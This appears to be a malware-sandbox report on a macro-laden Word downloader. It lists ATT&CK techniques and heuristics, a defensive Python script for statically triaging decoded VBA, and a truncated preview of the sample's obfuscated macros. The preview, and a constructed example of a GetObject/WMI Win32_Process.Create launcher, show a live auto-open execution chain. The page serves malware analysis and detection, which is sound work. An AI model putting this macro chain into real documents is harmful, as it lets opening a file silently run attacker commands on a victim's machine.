Verdict: MALICIOUS (Risk Score 242)
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1105 Ingress Tool Transfer
The sample is a malicious Word document carrying VBA macros. It has an autoopen entry point, which calls the helper function uBAGcC; the heuristics also flag a GetObject call and a WMI Win32_Process .Create chain, which together indicate that the macro starts an arbitrary command as soon as the document is opened. ClamAV's generic Doc.Downloader detection points the same way. The extracted source is heavily padded with junk code: branches that compare never-assigned variables, Select Case blocks keyed on random constants, throwaway Rnd/Tan/CByte arithmetic whose results are never read, and always-true predicates such as If 1337 < 24328 Then. That padding prevents a definitive read of the exact payload from the preview alone, but the overall pattern is a downloader that fetches and executes a second stage.
Heuristics (7)
- ClamAV: Doc.Downloader.00536d-6941907-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Downloader.00536d-6941907-0
- VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- VBA WMI Win32_Process launcher [critical] OLE_VBA_WMI_PROCESS_CREATE: VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain; the WMI class name is often hidden through string concatenation or helper functions.
- AutoOpen macro [high] OLE_VBA_AUTOOPEN: AutoOpen macro
- GetObject call [high] OLE_VBA_GETOBJ: GetObject call
- Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. (Rule text as emitted by the analyzer; on this sample a VBA project was in fact recovered, see the extracted macros.bas artifact below, so treat this marker as corroborating the AutoOpen finding rather than as a separate signal.)
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the standard OOXML DrawingML namespace URI and is not a network indicator; do not add it to blocklists.
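The execution chain described in the heuristics above (an auto-exec entry point, GetObject, and a WMI Win32_Process .Create call whose class name is hidden behind string concatenation or helper variables) and the junk-code padding visible in the preview can both be checked statically on the decoded VBA. The script below is an added example written for this page, not code from the analyzer or from oletools. It folds literal concatenation and single-assignment string variables before matching, evaluates constant If predicates, and lists assignments whose target is never read. The embedded macro text is constructed for the example: the variable names echo the preview, but the GetObject/Win32_Process lines and the command string are hypothetical and are not taken from the real macros.bas.

```python
"""Static triage of decoded VBA macro source (added example, not analyzer code)."""
import re
from collections import Counter
from typing import Dict, List, Tuple

AUTO_EXEC = {"autoopen", "auto_open", "autoexec", "autoclose", "auto_close",
             "document_open", "document_close", "workbook_open"}

STR_LIT = r'"(?:[^"]|"")*"'
TOKEN = re.compile(STR_LIT + r"|[A-Za-z_]\w*")
CONCAT = re.compile(r'"([^"]*)"\s*[&+]\s*"([^"]*)"')
ASSIGN = re.compile(r"^\s*(?:Const\s+|Set\s+)?([A-Za-z_]\w*)\s*=\s*(\S.*?)\s*$", re.I)
PROC = re.compile(r"^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+([A-Za-z_]\w*)", re.I)
CONST_IF = re.compile(r"^\s*If\s+(-?\d+)\s*(<>|<=|>=|<|>|=)\s*(-?\d+)\s+Then", re.I)
OPS = {"=": lambda a, b: a == b, "<>": lambda a, b: a != b, "<": lambda a, b: a < b,
       ">": lambda a, b: a > b, "<=": lambda a, b: a <= b, ">=": lambda a, b: a >= b}


def fold_concat(expr: str) -> str:
    """Join adjacent literals until nothing changes: "win" & "mgmts" -> "winmgmts"."""
    prev = None
    while prev != expr:
        prev, expr = expr, CONCAT.sub(r'"\1\2"', expr)
    return expr


def substitute(expr: str, consts: Dict[str, str]) -> str:
    """Replace identifiers bound to a string constant with the literal, then fold."""
    def repl(m):
        tok = m.group(0)
        if tok.startswith('"') or tok.lower() not in consts:
            return tok
        return '"%s"' % consts[tok.lower()]
    return fold_concat(TOKEN.sub(repl, expr))


def resolve_line(line: str, consts: Dict[str, str]) -> str:
    """Substitute on the whole line, except the target of an assignment."""
    m = ASSIGN.match(line)
    start = m.start(2) if m else 0
    return line[:start] + substitute(line[start:], consts)


def collect_constants(source: str) -> Dict[str, str]:
    """Forward pass: a variable whose right-hand side folds to one literal becomes a constant."""
    consts: Dict[str, str] = {}
    for line in source.splitlines():
        m = ASSIGN.match(line)
        if m:
            rhs = substitute(m.group(2), consts)
            if re.fullmatch(STR_LIT, rhs):
                consts[m.group(1).lower()] = rhs[1:-1]
    return consts


def triage(source: str) -> dict:
    """Return the signals an analyst wants from one decoded macro module set."""
    consts = collect_constants(source)
    lines = source.splitlines()
    resolved = [resolve_line(line, consts) for line in lines]
    changed = [r.strip() for raw, r in zip(lines, resolved) if r != raw]
    flat = "\n".join(resolved).lower()
    procs = [m.group(1).lower() for m in map(PROC.match, lines) if m]
    predicates: List[Tuple[str, bool]] = []
    for line in lines:
        m = CONST_IF.match(line)
        if m:  # literal-vs-literal comparison: junk-code padding, record which branch runs
            predicates.append((line.strip(), OPS[m.group(2)](int(m.group(1)), int(m.group(3)))))
    # Dead stores: a name assigned once and never mentioned again. String bodies are
    # blanked first so text inside literals does not count as a reference.
    assigned = {m.group(1).lower() for m in map(ASSIGN.match, lines) if m}
    mentions = Counter(w.lower() for w in re.findall(r"[A-Za-z_]\w*", re.sub(STR_LIT, '""', source)))
    return {
        "entry_points": sorted(p for p in procs if p in AUTO_EXEC),
        "getobject": re.search(r"getobject\s*\(", flat) is not None,
        "wmi_process_create": ("winmgmts" in flat and "win32_process" in flat
                               and re.search(r"\.create\b", flat) is not None),
        "constant_predicates": predicates,
        "dead_stores": sorted(n for n in assigned if mentions[n] <= 1),
        "resolved": changed,  # lines that changed after folding; the moniker and command surface here
    }


# Constructed macro text for the example. The junk lines mimic the preview above;
# the GetObject / Win32_Process lines and the command are hypothetical.
SAMPLE = '''Attribute VB_Name = "MZAACA"
Sub autoopen()
    If kAUAQ_AB = QXAAAAx Then
        WAB41AA = Rnd(rAAAAAAD + 677670062 + 2798646 / vwCAkACU)
    End If
    If 1337 < 24328 Then
        uBAGcC
    End If
End Sub
Attribute VB_Name = "iBADUAkX"
Function uBAGcC()
    On Error Resume Next
    CADxX4 = CByte(pBDoAAXQ + 234393663 + lUwUZQAA + 868441809)
    p1 = "win" & "mgmts" & ":"
    p2 = "Win32_" + "Process"
    cmd = "cmd.exe /c " & "echo example"
    Set svc = GetObject(p1 & p2)
    svc.Create cmd, Null, Null, pid
End Function
'''

if __name__ == "__main__":
    for key, value in triage(SAMPLE).items():
        print(f"{key}: {value}")
```

Run it against the real artifact with `triage(open("macros.bas").read())`; the `resolved` list is where a winmgmts moniker and the command line surface when the macro does what OLE_VBA_WMI_PROCESS_CREATE describes. The folder only handles literal concatenation and straight string assignments; a sample that builds the class name with Chr(), StrReverse or Replace() needs an emulator such as ViperMonkey rather than this pass. The dead-store list is a heuristic too: a Public variable assigned in one module and read in another would be counted as dead.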
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 32269 bytes |

SHA-256: 67539ae37329bf49eb1335ec0e8a12bd4f732cde821c5d1ff5c73b0a5adcc252

Preview (first 1,000 lines of the extracted script; the listing below is cut off where marked):
Attribute VB_Name = "NGDGxQ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "S_AACXQD"
Attribute VB_Base = "0{70959F31-593E-412A-9A0A-39C4C314EA6D}{6640755B-1874-4CD3-A1C7-B1D09AB67CC9}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "vcA4ABAQ"
Attribute VB_Base = "0{AECFE2FD-10A3-437B-96D2-F1210DFA7F95}{BB34A576-4813-4113-81DE-246BC69781BB}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "MZAACA"
Sub autoopen()
If kAUAQ_AB = QXAAAAx Then
Select Case jDBU_wDU
Case 226449590
WAB41AA = Rnd(rAAAAAAD + 677670062 + 2798646 / vwCAkACU)
CADxX4 = CByte(pBDoAAXQ + 234393663 + lUwUZQAA + 868441809)
Case 156554485
wwAGAUk = LAXBBAXA
AkAcUAA = Tan(NcAUU_A - CSng(LxAkDA))
End Select
End If
If rkQAZwAA = pAZAAAZ Then
Select Case kA4ACA
Case 80623455
LBDDBk = Rnd(uAQDAA + 946247038 + 94711518 / dZAwAAU)
NC4XAAAU = CByte(kDDcAQX + 578789574 + FAAUwZAD + 11133948)
Case 433685152
XDDAAkk = hAGQAXZ1
s4AA4o = Tan(vkAUAQAA - CSng(IwA__x_B))
End Select
End If
If LxQDoAQQ = kQBAXAB Then
Select Case zCQAoc
Case 906699795
qU4AoUB = Rnd(wAGXUQ + 675552437 + 571895460 / PUACAA)
WkADcAkC = CByte(ooAZ1Q4A + 637281627 + Nw1DAXC + 777502892)
Case 438121677
QBAQwoG = WUAAUC
OAD4Q1X = Tan(kAAXAGQ - CSng(RAQQUUw))
End Select
End If
uBAGcC
If qAXc1B = zQAAxDA Then
Select Case wQXAXBAA
Case 612525908
vBC4XC = Rnd(zA_1A4Xc + 251468979 + 164549338 / H1AA_4B)
nAGQABD4 = CByte(DX1DX_Z + 473168191 + tXDUwC + 632693492)
Case 139213862
iDQQXA = YxADwQB
vwGCkQ4A = Tan(wQACwAo - CSng(jQA1UccQ))
End Select
End If
If ICocAA = YoAD4Ak Then
Select Case w4DCAAA
Case 337117213
fAAAUA = Rnd(WAABCX + 680197576 + 909755657 / nUAUA4)
pAA4AGA = CByte(hUBAXDx + 697198569 + TGA1AA + 591693543)
Case 573806582
JB_Z1kA = w4w_GxZD
fQUA_AA = Tan(iXADADDQ - CSng(nDAQoD))
End Select
End If
End Sub
Attribute VB_Name = "iBADUAkX"
Function uBAGcC()
On Error Resume Next
If jQAcAU = sABGBADZ Then
Select Case Fx1AQAxC
Case 411757465
NDBZ1_A = Rnd(nXAABUD + 952478814 + 254718867 / OAxxXADQ)
Q1QZ4o1A = CByte(wBGXAAD + 433126122 + DGQQAZA + 546119096)
Case 280958406
TkQAAw = ZAQGAx
rkCGAU = Tan(hQADDQAo - CSng(dUkAxxC))
End Select
End If
If jXDcQUA = XAAcX4QA Then
Select Case nAQwAAAA
Case 490152013
j4BwCA4A = Rnd(zAAoAGZ + 748850684 + 32846237 / bxAAkCQ)
MBcxQB = CByte(LCAAU1QA + 622645831 + YAA_UDA + 569507069)
Case 647274870
iDQcUAAo = RAQDAA
HAZ4BUXA = Tan(i41GBU1 - CSng(Uo4cAw))
End Select
End If
If 1337 < 24328 Then
zDAAA4 = vbFalse
If fkD1cCDB = HAGAA1oB Then
Select Case DQAckQU_
Case 267900430
nAAUkB = Rnd(LCZBo_B + 654686259 + 33754147 / sAxkGA)
H_Ao1A = CByte(kZUXABk + 236626823 + zQZ1oGU + 42840483)
Case 779844403
v_AGAXxc = bADAAA
PAQwkDU4 = Tan(iZAAkAQ - CSng(bUDkAB))
End Select
End If
If oBZkXQ1_ = hGC4BoB Then
Select Case uAA_UQZ
Case 886016921
... (truncated)